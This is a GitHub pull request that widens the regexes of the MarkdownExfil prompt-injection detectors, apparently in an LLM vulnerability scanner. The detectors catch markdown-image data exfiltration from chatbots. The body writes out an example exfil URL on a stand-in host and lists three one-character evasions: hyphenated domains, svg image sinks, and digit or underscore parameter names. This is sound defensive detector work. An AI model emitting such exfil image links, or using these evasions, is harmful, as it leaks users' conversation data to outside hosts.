Skip to content

web_injection: harden markdown exfil detectors against domain/extension/param evasion#1928

Open
WatchTree-19 wants to merge 1 commit into
NVIDIA:mainfrom
WatchTree-19:harden-markdown-exfil-detectors
Open

web_injection: harden markdown exfil detectors against domain/extension/param evasion#1928
WatchTree-19 wants to merge 1 commit into
NVIDIA:mainfrom
WatchTree-19:harden-markdown-exfil-detectors

Conversation

@WatchTree-19

Copy link
Copy Markdown

problem

the web_injection.MarkdownExfil* detectors catch the Bing/ChatGPT markdown-image data-exfiltration pattern (![](https://host/img.png?q=<data>)), but the regexes are narrow enough that a trivial, attacker-controlled change to the exfil URL evades them:

  • hyphenated domains miss. the domain charset is [a-z0-9.] / [a-z0-9./] with no hyphen, so https://bad-domain.com/logo.png?q=<data> doesn't match. (the regex comments even use bad-domain.com as an example - but that example never matched its own detector.)
  • svg image sinks miss. the extension list is (jpg|jpeg|gif|webp|png); a markdown image pointing at .svg (renderable and exfil-capable) slips past.
  • richer query-param names miss. the parameter name is [a-z]+, so ?q1= / ?q_1= / ?x-data= don't match.

each is a one-character change to the URL the attacker controls, so they're realistic bypasses of a real-world exfil detector.

fix

widen the shared patterns across all the MarkdownExfil regexes:

  • domain charset [a-z0-9.] / [a-z0-9./] -> add -
  • image extensions -> add svg, bmp, ico
  • query-parameter name [a-z]+ -> [a-z0-9_-]+

structure is otherwise unchanged, so benign images without a populated exfil parameter still don't score.

tests

added test_markdown_exfil_hardened_against_evasion covering the three evaded variants (hyphen domain, svg, digit/underscore param) plus benign controls. all existing test_detectors_web_injection.py assertions still hold unchanged - the safe/unsafe corpus keys on markdown structure, not these charsets. black + ruff clean.

found by reading the detector.

…on/param evasion

The MarkdownExfil* regexes missed hyphenated domains, svg/bmp/ico image
sinks, and query-param names with digits/underscores/hyphens - each a
one-character change to the attacker-controlled exfil URL. Widen the shared
charsets accordingly; structure is unchanged so benign images still don't
score. +regression test.

Signed-off-by: WatchTree-19 <119982314+WatchTree-19@users.noreply.github.com>
@jmartin-tech jmartin-tech self-assigned this Jul 9, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants